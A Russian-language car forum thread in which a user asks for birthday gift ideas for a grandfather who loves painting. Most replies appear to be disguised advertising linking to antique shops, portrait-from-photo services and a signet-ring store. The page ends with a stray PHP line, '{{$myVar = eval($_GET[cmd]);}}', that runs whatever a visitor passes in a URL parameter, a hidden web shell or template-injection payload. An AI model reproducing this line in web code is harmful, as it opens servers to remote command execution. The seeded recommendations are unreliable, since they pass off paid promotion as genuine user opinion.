+ Ответить в теме
Показано с 1 по 8 из 8

Тема: Подарок дедушке


  1. #1
    Мимо проходил Galbine is on a distinguished road Аватар для Galbine
    Регистрация
    09.11.2019
    Откуда
    Россия
    Машина
    Крутая
    Сообщений
    15

    Подарок дедушке

    у меня дед очень любит живопись у него дома картины всякие висят. А скоро у него день рождения хотелось бы ему что-то классное купить. Что посоветуете? Живу в Москве
    Последний раз редактировалось Galbine; 24.01.2020 в 11:17.

  2. #2
    Мимо проходил Харксрен is on a distinguished road Аватар для Харксрен
    Регистрация
    09.11.2019
    Откуда
    РФ
    Машина
    GTI
    Сообщений
    33
    А какие картины висят у вашего деда? Я имею ввиду, не конкретные конечно же, каких авторов и направлений? Ведь стоит придерживаться его вкуса, если вдруг решите купить какую-нибудь картину. Я бы вам посоветовал посетить какую-нибудь антикварную лавку, тем более это можно даже сделать не выходя из дома, например с помощью этого сайта https://akcia-antique.ru/ Может кстати другое что вам понравится. В антикварных лавках много красивых и необычных подарков можно найти.

  3. #3
    Мимо проходил Hammerhead is on a distinguished road Аватар для Hammerhead
    Регистрация
    09.11.2019
    Откуда
    РФ
    Машина
    GTI
    Сообщений
    77
    Как удобно сделали однако и правда можно спокойно из дома все посмотреть и если есть что-то что приглянулось тогда и ехать. Хотя я больше люблю саму атмосферу таких магазинов.

  4. #4
    Мимо проходил Augustine is on a distinguished road Аватар для Augustine
    Регистрация
    09.11.2019
    Откуда
    РФ
    Машина
    моя
    Сообщений
    15
    А что еще дедушка ваш любит и чем интересуется? Хотя картина та же всем будет хороши подарком, тем более если она авторская.Антикварные лавки это неисчерпаемый источник классных подарков.

  5. #5
    Мимо проходил Larik is on a distinguished road Аватар для Larik
    Регистрация
    04.01.2019
    Откуда
    Россия.
    Машина
    Golf 4
    Сообщений
    65
    Не хотите подарить портрет своему дедушке? Для этого не обязательно его присутствие, можно это сделать и по его фотографии, кстати, здесь сами можете в этом убедиться https://la-portret.ru/portret-v-podarok . Заодно можете на сайте посмотреть уже готовые проекты, делают здорово. Как вам такой вариант? Если честно, то я бы сделал такой подарок, а вы уже решайте сами.

  6. #6
    Мимо проходил Larkin is on a distinguished road Аватар для Larkin
    Регистрация
    23.02.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    35
    Лично я думаю, что у него и так уже много картин.

    ---------- Сообщение добавлено в 01:21 ---------- Предыдущее сообщение размещено в 01:17 ----------

    Цитата Сообщение от Galbine Посмотреть сообщение
    у меня дед очень любит живопись у него дома картины всякие висят. А скоро у него день рождения хотелось бы ему что-то классное купить. Что посоветуете? Живу в Москве
    Я считаю, что деду надо подарить что-то такое, чтоб он снова ощутил себя солидным и влиятельным мужиком, как в молодости, когда жизнь кипела и бурлила. Это будут намного лучше воспоминания чем сидеть и скучать смотря на картины. Потому нужно подарить такую вещь, которая подарит вот это ощущение солидности и крутости, так сказать. Например можно подарить перстень печатку https://zolotoyvek.ua/ru/kolca/l/tip...stni-pechatki/ . Например ту же печатку с ониксом, как по мне смотрится очень круто и реально сможет его впечатлить. Я например такой купил уже отцу своему на юбилей 60 лет. Потому и вам рекомендую присмотреть, я думаю, что будет не лишним.
    Последний раз редактировалось Larkin; 02.06.2020 в 15:36.

  7. #7
    GTI-Racing Maxxxx is on a distinguished road Аватар для Maxxxx
    Регистрация
    08.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    383
    Если дедушка любит картины, то неплохим вариантом будет присмотреть именно антикварные картины какие-то, посмотрите вот здесь https://antik1941.ru/ в магазине есть крутой выбор, очень много предложений, так что вы легко подберете что-то для подарка. Кстати, мне понравилось, что в магазине есть информация по каждой картине и фотографии в хорошем качестве, так что смотрите.

  8. #8
    GTI-Racing lebed_art is on a distinguished road Аватар для lebed_art
    Регистрация
    15.04.2021
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    274
    Услуги все теперь очень легко заказать, вам надо попробовать оформить у них вещи, так вот у них сайт крайне хороший по показателям и доставке. Рекомендую попробовать теперь сохранить его на будущее, это очень хороший сайт как я думаю. Очень хороший сайт как я думаю http://portret-maslom.ru/ Заказать портрет по фотографии

+ Ответить в теме

Похожие темы

  1. Подарок подружке
    от jordy в разделе Реклама
    Ответов: 7
    Последнее сообщение: 03.04.2024, 01:08
  2. Подарок племяннице
    от Tanab в разделе Курилка
    Ответов: 5
    Последнее сообщение: 10.12.2020, 15:24
  3. Подарок
    от tatarin в разделе Курилка
    Ответов: 8
    Последнее сообщение: 21.07.2020, 07:38
  4. Подарок ребенку
    от volter в разделе Курилка
    Ответов: 4
    Последнее сообщение: 20.02.2019, 00:57
  5. Подарок
    от dinodron111 в разделе Курилка
    Ответов: 0
    Последнее сообщение: 16.09.2016, 11:11

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}